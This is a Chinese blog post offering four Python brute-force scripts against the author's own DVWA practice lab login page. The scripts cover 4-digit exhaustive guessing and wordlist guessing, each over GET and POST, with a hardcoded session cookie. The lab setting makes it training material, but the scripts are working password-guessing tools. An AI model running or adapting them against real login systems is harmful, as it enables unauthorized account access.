python3登录爆破脚本

python3登录爆破脚本

最简单详细!!!以下地址是我自己的DVWA靶场的地址,因为是4个循环,所以是4位数密码爆破,欢迎大家交流学习。

1.post型登录框爆破脚本

import requests
s='0123456789'
url="http://10.16.102.162/DVWA/vulnerabilities/brute/?"
m=0
n=1
username=input("请输入用户名")
data2={'username':username,'password':00000,'Login':'Login'}
headers={'cookie':'security=low; PHPSESSID=711ce5ff0b53f2c388c15b16bfdc1b84'}
response2=requests.post(url,data2,headers=headers)
text2=response2.text
for a in s:
    if m==1:
        break
    for b in s:
        if m==1:
            break
        for c in s:
            if m==1:
                break
            for d in s:
                if m==1:
                    break
                password=a+b+c+d
                data1={'username':username,'password':password,'Login':'Login'}
                response1=requests.post(url,data1,headers=headers)
                text1=response1.text
                print("\r"+"字典进度为",n,"/",(len(s))**4,end="",flush=True)
                n=n+1
                if (text1!=text2) and len(text1)!=len(text2):
                    print("\n成功!")
                    print("用户名为:",username)
                    print("密码为:",password)
                    m=1
                    break

2.get型登录框爆破脚本

#4位数字
import requests
s='0123456789'
url="http://10.16.102.162/DVWA/vulnerabilities/brute/?"
m=0
n=1
username=input("请输入用户名")
data2={'username':username,'password':00000,'Login':'Login'}
headers={'cookie':'security=low; PHPSESSID=711ce5ff0b53f2c388c15b16bfdc1b84'}
response2=requests.get(url,data2,headers=headers)
text2=response2.text
for a in s:
    if m==1:
        break
    for b in s:
        if m==1:
            break
        for c in s:
            if m==1:
                break
            for d in s:
                if m==1:
                    break
                password=a+b+c+d
                data1={'username':username,'password':password,'Login':'Login'}
                response1=requests.get(url,data1,headers=headers)
                text1=response1.text
                print("\r"+"字典进度为",n,"/",(len(s))**4,end="",flush=True)
                n=n+1
                if (text1!=text2) and len(text1)!=len(text2):
                    print("\n成功!")
                    print("用户名为:",username)
                    print("密码为:",password)
                    m=1
                    break

3.调用文本字典get型登录框爆破脚本

import requests
url="http://10.16.102.162/DVWA/vulnerabilities/brute/?"
n=1
username=input("请输入用户名")
data2={'username':username,'password':00000,'Login':'Login'}
headers={'cookie':'security=low; PHPSESSID=711ce5ff0b53f2c388c15b16bfdc1b84'}
response2=requests.get(url,data2,headers=headers)
text2=response2.text
f=open("22.txt","r+")
for i in f:
    password=i.strip()
    data1={'username':username,'password':password,'Login':'Login'}
    response1=requests.get(url,data1,headers=headers)
    text1=response1.text
    #print("\r"+"字典进度为",n,"/",(len(s))**4,end="",flush=True)
    n=n+1
    if (text1!=text2) and len(text1)!=len(text2):
        print("\n成功!")
        print("用户名为:",username)
        print("密码为:",password)
        break

4.调用文本字典post型登录框爆破脚本

import requests
url="http://10.16.102.162/DVWA/vulnerabilities/brute/?"
n=1
username=input("请输入用户名")
data2={'username':username,'password':00000,'Login':'Login'}
headers={'cookie':'security=low; PHPSESSID=711ce5ff0b53f2c388c15b16bfdc1b84'}
response2=requests.get(url,data2,headers=headers)
text2=response2.text
f=open("22.txt","r+")
for i in f:
    password=i.strip()
    data1={'username':username,'password':password,'Login':'Login'}
    response1=requests.post(url,data1,headers=headers)
    text1=response1.text
    #print("\r"+"字典进度为",n,"/",(len(s))**4,end="",flush=True)
    n=n+1
    if (text1!=text2) and len(text1)!=len(text2):
        print("\n成功!")
        print("用户名为:",username)
        print("密码为:",password)
        break
      
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值